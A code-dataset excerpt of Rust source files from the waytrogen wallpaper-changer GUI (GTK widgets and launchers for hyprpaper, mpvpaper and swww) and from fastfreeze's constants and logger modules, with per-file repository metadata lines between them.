create_application_window(app: &Application) -> ApplicationWindow { let window = ApplicationWindow::builder() .application(app) .title("Watering") .build(); window.set_default_size(1024, 600); window.present(); window } fn textbuffer_to_string(text_buffer: &TextBuffer) -> String { text_buffer .text(&text_buffer.start_iter(), &text_buffer.end_iter(), false) .to_string() } fn create_no_changers_window(window: &ApplicationWindow) { let application_box = create_application_box(); let text_box = Box::builder() .halign(Align::Center) .valign(Align::Center) .orientation(Orientation::Horizontal) .build(); let confirm_button = Button::builder() .label(gettext("Ok")) .vexpand(true) .hexpand(true) .can_shrink(true) .has_tooltip(true) .tooltip_text(gettext("Close waytrogen")) .valign(Align::End) .halign(Align::Center) .hexpand(true) .build(); let error_message_label = Label::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .label(gettext( "No wallpaper changers detected.\n Please install one or more of the following:\n\n - Hyprpaper\n - Swaybg\n - Mpvpaper\n - SWWW\n\n If waytrogen continues failing to detect an installed changer,\n please feel free open issue on the GitHub repository:\n https://github.com/nikolaizombie1/waytrogen/issues", )) .halign(Align::Center) .valign(Align::Center) .build(); confirm_button.connect_clicked(clone!( #[strong] window, move |_| { window.close(); } )); text_box.append(&error_message_label); application_box.append(&text_box); application_box.append(&confirm_button); window.set_child(Some(&application_box)); } fn create_image_filter_entry( settings: &Settings, image_list_store: &ListStore, monitors_dropdown: &DropDown, sort_dropdown: &DropDown, invert_sort_switch: &Switch, removed_images_list_store: &ListStore, wallpaper_changers_dropdown: &DropDown, ) -> Entry { let entry = Entry::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .placeholder_text(gettext("Find images")) 
.has_tooltip(true) .tooltip_text(gettext( "Filter wallpapers based on the name. Fuzzy matching the name.", )) .build(); settings .bind("image-filter", &entry.buffer(), "text") .build(); entry.connect_activate(clone!( #[strong] image_list_store, #[strong] monitors_dropdown, #[strong] settings, #[strong] sort_dropdown, #[strong] invert_sort_switch, #[strong] removed_images_list_store, #[strong] wallpaper_changers_dropdown, move |e| { change_image_button_handlers( &image_list_store, &wallpaper_changers_dropdown, &monitors_dropdown, &settings, ); hide_unsupported_files( &image_list_store,
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
true
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/hyprpaper.rs
src/hyprpaper.rs
use gettextrs::gettext; use log::{debug, error, warn}; use std::{path::Path, process::Command, thread, time::Duration}; use which::which; pub fn change_hyprpaper_wallpaper(image: &Path, monitor: &str) { debug!("Starting hyprpaper"); if !Command::new("pgrep") .arg("hyprpaper") .spawn() .unwrap() .wait() .unwrap() .success() { match Command::new("systemctl") .arg("--user") .arg("start") .arg("hyprpaper") .spawn() .unwrap() .wait() { Ok(_) => {} Err(_) => match which("hyprpaper") { Ok(_) => { warn!("Hyprpaper could not be started using Systemd. Attempting to start using command line interface"); #[allow(clippy::zombie_processes)] Command::new("hyprpaper").spawn().unwrap(); } Err(_) => { error!("Wallpaper could not be changed: Failed to start hyprpaper using Systemd and command line interface."); return; } }, } } thread::sleep(Duration::from_millis(200)); Command::new("hyprctl") .arg("hyprpaper") .arg("unload") .arg("all") .spawn() .unwrap() .wait() .unwrap(); thread::sleep(Duration::from_millis(200)); Command::new("hyprctl") .arg("hyprpaper") .arg("preload") .arg(image.as_os_str()) .spawn() .unwrap() .wait() .unwrap(); thread::sleep(Duration::from_millis(200)); let monitor = if monitor == gettext("All") { "" } else { monitor }; Command::new("hyprctl") .arg("hyprpaper") .arg("wallpaper") .arg(format!("{},{}", monitor, image.to_str().unwrap())) .spawn() .unwrap() .wait() .unwrap(); }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/mpvpaper.rs
src/mpvpaper.rs
use crate::wallpaper_changers::{ MpvPaperPauseModes, MpvPaperSlideshowSettings, WallpaperChanger, WallpaperChangers, }; use gettextrs::gettext; use gtk::{ gio::Settings, glib::clone, prelude::*, Adjustment, Align, Box, DropDown, Entry, SpinButton, StringObject, Switch, TextBuffer, }; use std::{ path::{Path, PathBuf}, process::Command, }; const ALL_MONITOR_SOCKET: &str = "/tmp/mpv-socket-All"; pub fn change_mpvpaper_wallpaper( mpvpaper_changer: &WallpaperChangers, image: PathBuf, monitor: &str, ) { if let WallpaperChangers::MpvPaper(pause_mode, slideshow, mpv_options) = mpvpaper_changer { log::debug!("{}", image.display()); let mut command = Command::new("mpvpaper"); let socket = if monitor == gettext("All") { String::from(ALL_MONITOR_SOCKET) } else { format!("/tmp/mpv-socket-{monitor}") }; let mpv_options = format!("input-ipc-server={socket} {mpv_options}"); let monitor = if monitor == gettext("All") { "*" } else { monitor }; command.arg("-o").arg(mpv_options); match pause_mode { MpvPaperPauseModes::None => {} MpvPaperPauseModes::AutoPause => { command.arg("--auto-pause"); } MpvPaperPauseModes::AutoStop => { command.arg("--auto-stop"); } } if slideshow.enable { command.arg("-n").arg(slideshow.seconds.to_string()); } let socket_path = std::path::Path::new(&socket); if socket_path.exists() { log::debug!("Attempting to close socket."); Command::new("bash") .arg("-c") .arg(format!("echo quit | socat - {socket}")) .spawn() .unwrap() .wait() .unwrap(); Command::new("rm") .arg(socket) .spawn() .unwrap() .wait() .unwrap(); } let all_monitor_socket_exists = std::path::Path::new(ALL_MONITOR_SOCKET).exists(); if all_monitor_socket_exists && monitor != gettext("All") { Command::new("bash") .arg("-c") .arg(format!("echo quit | socat - {ALL_MONITOR_SOCKET}")) .spawn() .unwrap() .wait() .unwrap(); } else if all_monitor_socket_exists && monitor == gettext("All") { mpvpaper_changer.kill(); } command .arg(monitor) .arg(image) .arg("-f") .spawn() .unwrap() .wait() .unwrap(); } } pub 
fn generate_mpvpaper_changer_bar(changer_specific_options_box: &Box, settings: Settings) { let pause_options_dropdown = DropDown::from_strings(&[ &gettext("none"), &gettext("auto-pause"), &gettext("auto-stop"), ]); pause_options_dropdown.set_margin_top(12); pause_options_dropdown.set_margin_start(12); pause_options_dropdown.set_margin_bottom(12); pause_options_dropdown.set_margin_end(12); pause_options_dropdown.set_halign(Align::Start); pause_options_dropdown.set_valign(Align::Center); settings .bind("mpvpaper-pause-option", &pause_options_dropdown, "selected") .build(); changer_specific_options_box.append(&pause_options_dropdown); let slideshow_enable_switch = Switch::builder() .tooltip_text(gettext("Enable slideshow for the current folder.")) .has_tooltip(true) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::Start) .valign(Align::Center) .build(); let adjustment = Adjustment::new(5.0, 1.0, f64::MAX, 1.0, 0.0, 0.0); let spin_button = SpinButton::builder() .adjustment(&adjustment) .numeric(true) .has_tooltip(true) .tooltip_text(gettext("Slideshow change interval")) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::Start) .valign(Align::Center) .build(); changer_specific_options_box.append(&slideshow_enable_switch); changer_specific_options_box.append(&spin_button); settings .bind( "mpvpaper-slideshow-enable", &slideshow_enable_switch, "active", ) .build(); settings .bind("mpvpaper-slideshow-interval", &spin_button, "value") .build(); let mpv_options = create_mpv_options_textbox(&settings); changer_specific_options_box.append(&mpv_options); slideshow_enable_switch.connect_state_set(clone!(move |_, state| { if state { let pause_mode = pause_options_dropdown .selected_item() .and_downcast::<StringObject>() .unwrap() .string() .to_string() .parse::<MpvPaperPauseModes>() .unwrap(); let interval = spin_button.value() as u32; let options = mpv_options.text().to_string(); let slideshow_settings = 
MpvPaperSlideshowSettings { enable: state, seconds: interval, }; let varient = WallpaperChangers::MpvPaper(pause_mode, slideshow_settings, options); let path = settings.string("wallpaper-folder").to_string(); let monitor = settings.string("selected-monitor-item").to_string(); log::debug!( "{}: {:#?} {} {}", gettext("Entered switch callback"), varient, path, monitor ); varient.change(Path::new(&path).to_path_buf(), monitor); } false.into() })); } fn create_mpv_options_textbox(settings: &Settings) -> Entry { let mpv_options = Entry::builder() .placeholder_text(gettext("Additional mpv options")) .has_tooltip(true) .tooltip_text(gettext( "Additional command line options to be sent to mpv.", )) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .hexpand(true) .halign(Align::Start) .valign(Align::Center) .build(); let mpv_options_text_buffer = TextBuffer::builder().build(); settings .bind( "mpvpaper-additional-options", &mpv_options_text_buffer, "text", ) .build(); mpv_options.connect_changed(clone!( #[strong] mpv_options_text_buffer, move |e| { let text = &e.text().to_string()[..]; mpv_options_text_buffer.set_text(text); } )); mpv_options.set_text( mpv_options_text_buffer .text( &mpv_options_text_buffer.start_iter(), &mpv_options_text_buffer.end_iter(), false, ) .as_str(), ); mpv_options }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/swww.rs
src/swww.rs
use crate::{ common::RGB, wallpaper_changers::{ SWWWScallingFilter, SWWWTransitionBezier, SWWWTransitionPosition, U32Enum, WallpaperChangers, }, }; use gettextrs::gettext; use gtk::{ gdk::RGBA, gio::Settings, glib::{self, clone}, prelude::*, Adjustment, Align, Box, Button, ColorDialog, ColorDialogButton, DropDown, Entry, Label, SpinButton, Switch, TextBuffer, Window, }; use log::debug; use std::{path::PathBuf, process::Command}; pub fn change_swww_wallpaper(swww_changer: WallpaperChangers, image: PathBuf, monitor: String) { if let WallpaperChangers::Swww( resize_modes, fill_color, scalling_filter, transition_type, transition_step, transition_duration, transition_fps, transition_angle, transition_position, invert_y, transition_bezier, transition_wave, ) = swww_changer { debug!("Starting swww daemon"); Command::new("swww-daemon").spawn().unwrap().wait().unwrap(); let mut command = Command::new("swww"); command .arg("img") .arg("--resize") .arg(resize_modes.to_string()) .arg("--fill-color") .arg(fill_color.to_string()); if monitor != gettext("All") { command.arg("--outputs").arg(monitor); } command .arg("--filter") .arg(scalling_filter.to_string()) .arg("--transition-type") .arg(transition_type.to_string()) .arg("--transition-step") .arg(transition_step.to_string()) .arg("--transition-duration") .arg(transition_duration.to_string()) .arg("--transition-fps") .arg(transition_fps.to_string()) .arg("--transition-angle") .arg(transition_angle.to_string()) .arg("--transition-pos") .arg(transition_position.to_string()); if invert_y { command.arg("--invert-y"); } command .arg("--transition-bezier") .arg(transition_bezier.to_string()) .arg("--transition-wave") .arg(transition_wave.to_string()) .arg(image) .spawn() .unwrap() .wait() .unwrap(); } } pub fn generate_swww_changer_bar(changer_specific_options_box: &Box, settings: Settings) { let resize_dropdown = DropDown::from_strings(&[&gettext("no"), &gettext("crop"), &gettext("fit")]); resize_dropdown.set_margin_top(12); 
resize_dropdown.set_margin_start(12); resize_dropdown.set_margin_bottom(12); resize_dropdown.set_margin_end(12); resize_dropdown.set_halign(Align::Start); resize_dropdown.set_valign(Align::Center); changer_specific_options_box.append(&resize_dropdown); settings .bind("swww-resize", &resize_dropdown, "selected") .build(); let color_dialog = ColorDialog::builder().with_alpha(false).build(); let color_picker = ColorDialogButton::builder() .halign(Align::Start) .valign(Align::Center) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .dialog(&color_dialog) .build(); let rgb_text_buffer = TextBuffer::builder().build(); color_picker.connect_rgba_notify(clone!( #[weak] settings, move |b| { let rgba = b.rgba(); let serialize_struct = RGB { red: rgba.red(), green: rgba.green(), blue: rgba.blue(), } .to_string(); rgb_text_buffer.set_text(&serialize_struct); settings .bind("swww-fill-color", &rgb_text_buffer, "text") .build(); } )); let rgb = settings .string("swww-fill-color") .to_string() .parse::<RGB>() .unwrap(); color_picker.set_rgba( &RGBA::builder() .red(rgb.red) .green(rgb.green) .blue(rgb.blue) .build(), ); changer_specific_options_box.append(&color_picker); let advanced_settings_window = Window::builder() .title(gettext("SWWW Advanced Image Settings")) .hide_on_close(true) .build(); let advanced_settings_button = Button::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .label(gettext("Advanced Settings")) .halign(Align::Start) .valign(Align::Center) .build(); changer_specific_options_box.append(&advanced_settings_button); connect_advanced_settings_window_signals( &advanced_settings_button, advanced_settings_window, settings, ); } fn connect_advanced_settings_window_signals( advanced_settings_button: &Button, advanced_settings_window: Window, settings: Settings, ) { advanced_settings_button.connect_clicked(move |_| { let advanced_settings_window_box = Box::builder() .orientation(gtk::Orientation::Vertical) 
.margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .hexpand(true) .vexpand(true) .build(); advanced_settings_window.present(); advanced_settings_window.set_child(Some(&advanced_settings_window_box)); let filter_options_label = create_label("Scalling filter"); let filter_dropdown = create_filter_dropdown(&settings); let transition_type_label = create_label("Transition type"); let transition_type_dropdown = create_transition_type_dropdown(&settings); let filter_and_transition_box = create_category_box(); filter_and_transition_box.append(&filter_options_label); filter_and_transition_box.append(&filter_dropdown); filter_and_transition_box.append(&transition_type_label); filter_and_transition_box.append(&transition_type_dropdown); advanced_settings_window_box.append(&filter_and_transition_box); let transition_step_label = create_label("Transition step"); let transition_step_adjustment = Adjustment::new(90.0, 0.0, f64::from(u8::MAX), 1.0, 0.0, 0.0); let transition_step_spinbutton = create_spinbutton(&transition_step_adjustment); settings .bind("swww-transition-step", &transition_step_spinbutton, "value") .build(); let transition_duration_label = create_label("Transition duration"); let transition_duration_adjustment = Adjustment::new(3.0, 0.0, f64::from(u32::MAX), 1.0, 0.0, 0.0); let transition_duration_spinbutton = create_spinbutton(&transition_duration_adjustment); settings .bind( "swww-transition-duration", &transition_duration_spinbutton, "value", ) .build(); let transition_angle_label = create_label("Transition angle"); let transition_angle_adjustment = Adjustment::new(45.0, 0.0, 270.0, 1.0, 0.0, 0.0); let transition_angle_spinbutton = create_spinbutton(&transition_angle_adjustment); settings .bind( "swww-transition-angle", &transition_angle_spinbutton, "value", ) .build(); let transition_step_duration_angle_box = create_category_box(); transition_step_duration_angle_box.append(&transition_step_label); 
transition_step_duration_angle_box.append(&transition_step_spinbutton); transition_step_duration_angle_box.append(&transition_duration_label); transition_step_duration_angle_box.append(&transition_duration_spinbutton); transition_step_duration_angle_box.append(&transition_angle_label); transition_step_duration_angle_box.append(&transition_angle_spinbutton); advanced_settings_window_box.append(&transition_step_duration_angle_box); let transition_position_label = create_label("Transition position"); let transition_position_entry = create_transition_position_entry(); let transition_position_entry_text_buffer = TextBuffer::builder().build(); settings .bind( "swww-transition-position", &transition_position_entry_text_buffer, "text", ) .build(); transition_position_entry.set_text( transition_position_entry_text_buffer .text( &transition_position_entry_text_buffer.start_iter(), &transition_position_entry_text_buffer.end_iter(), false, ) .as_ref(), ); transition_position_entry.connect_changed(move |e| { let text = e.text().to_string(); if SWWWTransitionPosition::new(&text).is_ok() { transition_position_entry_text_buffer.set_text(&text); } }); let invert_y_label = create_label("Invert Y"); let invert_y_switch = create_switch("Invert y position in transition position flag"); settings .bind("swww-invert-y", &invert_y_switch, "active") .build(); let transition_wave_label = create_label("Transition wave"); let transition_wave_width_adjustment = Adjustment::new(20.0, 0.0, f64::from(u32::MAX), 1.0, 0.0, 0.0); let transition_wave_width_spinbutton = create_spinbutton(&transition_wave_width_adjustment); settings .bind( "swww-transition-wave-width", &transition_wave_width_spinbutton, "value", ) .build(); let transition_wave_height_adjustment = Adjustment::new(20.0, 0.0, f64::from(u32::MAX), 1.0, 0.0, 0.0); let transition_wave_height_spinbutton = create_spinbutton(&transition_wave_height_adjustment); settings .bind( "swww-transition-wave-height", &transition_wave_height_spinbutton, 
"value", ) .build(); let transition_position_invert_y_wave_box = create_category_box(); transition_position_invert_y_wave_box.append(&transition_position_label); transition_position_invert_y_wave_box.append(&transition_position_entry); transition_position_invert_y_wave_box.append(&invert_y_label); transition_position_invert_y_wave_box.append(&invert_y_switch); transition_position_invert_y_wave_box.append(&transition_wave_label); transition_position_invert_y_wave_box.append(&transition_wave_width_spinbutton); transition_position_invert_y_wave_box.append(&transition_wave_height_spinbutton); advanced_settings_window_box.append(&transition_position_invert_y_wave_box); let transition_bezier_label = create_label("Transition bezier"); let transition_bezier_adjustments = Adjustment::new(0.0, f64::MIN, f64::MAX, 0.01, 0.0, 0.0); let transition_bezier_p0_spinbutton = create_point_spinbutton(&transition_bezier_adjustments); settings .bind( "swww-transition-bezier-p0", &transition_bezier_p0_spinbutton, "value", ) .build(); let transition_bezier_p1_spinbutton = create_point_spinbutton(&transition_bezier_adjustments); settings .bind( "swww-transition-bezier-p1", &transition_bezier_p1_spinbutton, "value", ) .build(); let transition_bezier_p2_spinbutton = create_point_spinbutton(&transition_bezier_adjustments); settings .bind( "swww-transition-bezier-p2", &transition_bezier_p2_spinbutton, "value", ) .build(); let transition_bezier_p3_spinbutton = create_point_spinbutton(&transition_bezier_adjustments); settings .bind( "swww-transition-bezier-p3", &transition_bezier_p3_spinbutton, "value", ) .build(); let transition_bezier_fps_box = create_category_box(); let transition_frames_per_second_label = create_label("Transition FPS"); let transition_frames_per_second_adjustment = Adjustment::new(30.0, 1.0, f64::from(u32::MAX), 1.0, 0.0, 0.0); let transition_frames_per_second_spinbutton = create_spinbutton(&transition_frames_per_second_adjustment); settings .bind( "swww-transition-fps", 
&transition_frames_per_second_spinbutton, "value", ) .build(); transition_bezier_fps_box.append(&transition_bezier_label); transition_bezier_fps_box.append(&transition_bezier_p0_spinbutton); transition_bezier_fps_box.append(&transition_bezier_p1_spinbutton); transition_bezier_fps_box.append(&transition_bezier_p2_spinbutton); transition_bezier_fps_box.append(&transition_bezier_p3_spinbutton); transition_bezier_fps_box.append(&transition_frames_per_second_label); transition_bezier_fps_box.append(&transition_frames_per_second_spinbutton); advanced_settings_window_box.append(&transition_bezier_fps_box); let window_hide_button = create_button("Confirm"); let restore_defaults_button = create_button("Restore Defaults"); restore_defaults_button.connect_clicked(move |_| { filter_dropdown.set_selected(SWWWScallingFilter::default().to_u32()); transition_step_spinbutton.set_value(90.0); transition_duration_spinbutton.set_value(3.0); transition_angle_spinbutton.set_value(45.0); transition_position_entry.set_text(&SWWWTransitionPosition::default().to_string()); invert_y_switch.set_state(false); transition_wave_width_spinbutton.set_value(200.0); transition_wave_height_spinbutton.set_value(200.0); transition_bezier_p0_spinbutton.set_value(SWWWTransitionBezier::default().p0); transition_bezier_p1_spinbutton.set_value(SWWWTransitionBezier::default().p1); transition_bezier_p2_spinbutton.set_value(SWWWTransitionBezier::default().p2); transition_bezier_p3_spinbutton.set_value(SWWWTransitionBezier::default().p3); transition_frames_per_second_spinbutton.set_value(30.0); }); let window_control_box = create_window_control_box(); window_hide_button.connect_clicked(clone!( #[weak] advanced_settings_window, move |_| { advanced_settings_window.set_visible(false); } )); window_control_box.append(&restore_defaults_button); window_control_box.append(&window_hide_button); advanced_settings_window_box.append(&window_control_box); }); } fn create_filter_dropdown(settings: &Settings) -> DropDown { 
let filter_dropdown = DropDown::from_strings(&[ &gettext("nearest"), &gettext("bilinear"), &gettext("catmullrom"), &gettext("mitchell"), &gettext("lanczos3"), ]); filter_dropdown.set_margin_top(12); filter_dropdown.set_margin_start(12); filter_dropdown.set_margin_bottom(12); filter_dropdown.set_margin_end(12); filter_dropdown.set_halign(Align::Start); filter_dropdown.set_valign(Align::Center); settings .bind("swww-scaling-filter", &filter_dropdown, "selected") .build(); filter_dropdown } fn create_transition_type_dropdown(settings: &Settings) -> DropDown { let transition_type_dropdown = DropDown::from_strings(&[ &gettext("none"), &gettext("simple"), &gettext("fade"), &gettext("left"), &gettext("right"), &gettext("top"), &gettext("bottom"), &gettext("wipe"), &gettext("wave"), &gettext("grow"), &gettext("center"), &gettext("any"), &gettext("outer"), &gettext("random"), ]); transition_type_dropdown.set_margin_top(12); transition_type_dropdown.set_margin_start(12); transition_type_dropdown.set_margin_bottom(12); transition_type_dropdown.set_margin_end(12); transition_type_dropdown.set_halign(Align::Start); transition_type_dropdown.set_valign(Align::Center); settings .bind( "swww-transition-type", &transition_type_dropdown, "selected", ) .build(); transition_type_dropdown } fn create_category_box() -> Box { Box::builder() .orientation(gtk::Orientation::Horizontal) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .hexpand(true) .vexpand(true) .build() } fn create_button(text: &str) -> Button { Button::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .label(gettext(text)) .halign(Align::End) .valign(Align::Center) .build() } fn create_spinbutton(adjustment: &Adjustment) -> SpinButton { SpinButton::builder() .adjustment(adjustment) .numeric(true) .halign(Align::Center) .valign(Align::Center) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .build() } fn create_point_spinbutton(adjustment: &Adjustment) -> 
SpinButton { SpinButton::builder() .adjustment(adjustment) .numeric(true) .halign(Align::Center) .valign(Align::Center) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .build() } fn create_label(text: &str) -> Label { Label::builder() .label(gettext(text)) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::Center) .valign(Align::Center) .build() } fn create_window_control_box() -> Box { Box::builder() .orientation(gtk::Orientation::Horizontal) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::End) .valign(Align::Center) .hexpand(true) .vexpand(true) .build() } fn create_switch(text: &str) -> Switch { Switch::builder() .tooltip_text(gettext(text)) .has_tooltip(true) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::Start) .valign(Align::Center) .build() } fn create_transition_position_entry() -> Entry { Entry::builder() .placeholder_text(gettext("Transition position")) .has_tooltip(true) .tooltip_text(gettext("Can either be floating point number between 0 and 0.99, integer coordinate like 200,200 or one of the following: center, top, left, right, bottom, top-left, top-right, bottom-left or bottom-right.")) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::Start) .valign(Align::Center) .build() }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/consts.rs
src/consts.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use std::{ time::Instant, path::PathBuf, }; use crate::util::{ gen_random_alphanum_string, get_home_dir, }; // This file gathers all fastfreeze hard-coded settings /// The image version must be bumped when libvirttime or libvirtcpuid change, /// or when the `ImageManifest` format changes. pub const CURRENT_IMG_VERSION: &str = "2021-03-22"; // We compute the paths at runtime. It improves readability compared to using // macros at compile time. lazy_static! { // We pick /var/tmp/fastfreeze for our directory and not /tmp because we place the // original ELF loader there (see libvirtcpuid). We want this to persist across reboot. // Also, /tmp is sometimes mounted with tmpfs, and that would be bad for us. // We need to pick a writable place, that can be hard-coded (the ELF loader // needs the absolute path at compile time). 
pub static ref FF_DIR: PathBuf = PathBuf::from("/var/tmp/fastfreeze"); pub static ref NO_PRESERVE_FF_DIR: PathBuf = FF_DIR.join("run"); pub static ref APP_CONFIG_PATH: PathBuf = FF_DIR.join("app-config.json"); pub static ref FF_LOG_DIR: PathBuf = FF_DIR.join("logs"); // XXX When changing any of the `LD` paths, libvirtcpuid must be recompiled // See variables set in dist/Makefile pub static ref LD_SYSTEM_PATH: PathBuf = PathBuf::from("/lib64/ld-linux-x86-64.so.2"); pub static ref LD_SYSTEM_ORIG_PATH: PathBuf = NO_PRESERVE_FF_DIR.join( LD_SYSTEM_PATH.file_name().unwrap()); // This path is not necessarily ideal for root users as apparmor needs to be configured to // whitelist this path. But for non-root users, it's best for doing kubernetes mounting. pub static ref LD_VIRTCPUID_PATH: PathBuf = NO_PRESERVE_FF_DIR.join("ld-virtcpuid.so"); pub static ref LIBVIRTCPUID_PATH: PathBuf = NO_PRESERVE_FF_DIR.join("libvirtcpuid.so"); pub static ref LIBVIRTTIME_PATH: PathBuf = NO_PRESERVE_FF_DIR.join("libvirttime.so"); pub static ref LD_INJECT_ENV_PATH: PathBuf = FF_DIR.join("ld-inject.env"); pub static ref VIRT_TIME_CONF_PATH: PathBuf = FF_DIR.join("virttime-conf.bin"); pub static ref CRIU_SOCKET_DIR: PathBuf = NO_PRESERVE_FF_DIR.clone(); // XXX When changing this socket path, CRIU must be changed and recompiled. pub static ref NS_LAST_PID_SOCK_PATH: PathBuf = NO_PRESERVE_FF_DIR.join("set_ns_last_pid.sock"); pub static ref LOCK_FILE_PATH: PathBuf = NO_PRESERVE_FF_DIR.join("lock"); // CONTAINERS_DIR holds container directories. Each is a private // /var/tmp/fastfreeze directory for a given container pub static ref CONTAINERS_DIR: PathBuf = PathBuf::from("/tmp/fastfreeze"); // The following paths are valid once we mound bind the container dir onto FF_DIR. 
pub static ref CONTAINER_PID: PathBuf = NO_PRESERVE_FF_DIR.join("pid"); pub static ref CONTAINER_PTY: PathBuf = NO_PRESERVE_FF_DIR.join("pty"); pub static ref CONTAINER_APP_TMP: PathBuf = FF_DIR.join("tmp"); pub static ref DEFAULT_IMAGE_DIR: PathBuf = get_home_dir().map(|h| h.join(".fastfreeze")) .expect("Failed to determine home directory. Please set $HOME."); } /// Arbitrary application PID. Has to be bigger than 300 due to the way we do PID control pub const APP_ROOT_PID: i32 = 1000; /// When storing images, we use this filename to store our manifest pub const MANIFEST_FILE_NAME: &str = "manifest.json"; /// Number of seconds to wait for processes to respond to a SIGTERM before sending a SIGKILL pub const KILL_GRACE_PERIOD_SECS: u64 = 3; /// Exit code we return when encountering a fatal error. /// We use 170 to distinguish from the application error codes. pub const EXIT_CODE_FAILURE: u8 = 170; /// Exit code to denote an error during restore. Meaning that passing --no-restore would help /// running the application. pub const EXIT_CODE_RESTORE_FAILURE: u8 = 171; /// When a process is running, we keep its stderr buffered, so that when an error /// comes, we can report the stderr in metrics. This constant indicates how many /// lines we want to report. Typically, we'll get something useful with the last /// 50 lines. Having too many lines makes error triage difficult. pub const STDERR_TAIL_NUM_LINES: usize = 50; /// The default encryption cipher for encrypting the image. /// We can let users define it in the future. pub const DEFAULT_ENCRYPTION_CIPHER: &str = "aes-256-cbc"; lazy_static! { /// The invocation ID is a random 6 digit alphanum string. It is is used in a few places: /// 1) The shard prefix name /// 2) The log file name /// 3) Emitting metrics pub static ref INVOCATION_ID: String = gen_random_alphanum_string(6); } /// Where libraries like libvirttime.so and libvirtcpuid.so are searched /// in addition to LD_LIBRARY_PATH. 
pub const LIB_SEARCH_PATHS: &[&str] = &["/lib64", "/usr/lib", "/usr/local/lib"]; pub const KB: usize = 1024; pub const MB: usize = 1024*1024; pub const GB: usize = 1024*1024*1024; pub const PAGE_SIZE: usize = 4*KB; lazy_static! { pub static ref START_TIME: Instant = Instant::now(); }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/logger.rs
src/logger.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #![allow(clippy::option_map_unit_fn)] use anyhow::{Result, Context}; use std::{ io::prelude::*, io::stderr, sync::Mutex, fs, path::{Path, PathBuf}, }; use log::{Record, Metadata}; pub use log::LevelFilter; use chrono::prelude::*; use crate::{ consts::*, util::{create_dir_all, set_tmp_like_permissions}, }; pub struct Logger { cmd_name: &'static str, log_file: Option<(fs::File, PathBuf)>, stdout_enabled: bool, } impl Logger { fn log(&mut self, record: &Record) { let msg = format!("[ff.{}] ({:.3}s) {}\n", self.cmd_name, START_TIME.elapsed().as_secs_f64(), record.args()); // When we fail to write to the outputs, we dismiss the errors. // Maybe there's something better to do. if self.stdout_enabled { let _ = stderr().write_all(msg.as_bytes()); } let _ = self.log_file.as_mut().map(|f| f.0.write_all(msg.as_bytes())); } fn flush(&mut self) { let _ = stderr().flush(); let _ = self.log_file.as_mut().map(|f| f.0.flush()); } fn move_file(&mut self, directory: &Path) -> Result<()> { if let Some((old_file, old_path)) = self.log_file.take() { // unwrap() is safe here: we always have a log filename let new_path = directory.join(old_path.file_name().unwrap()); // We first attempt to rename the log file. If we fail due to // moving a file cross-device, we copy, and re-open. 
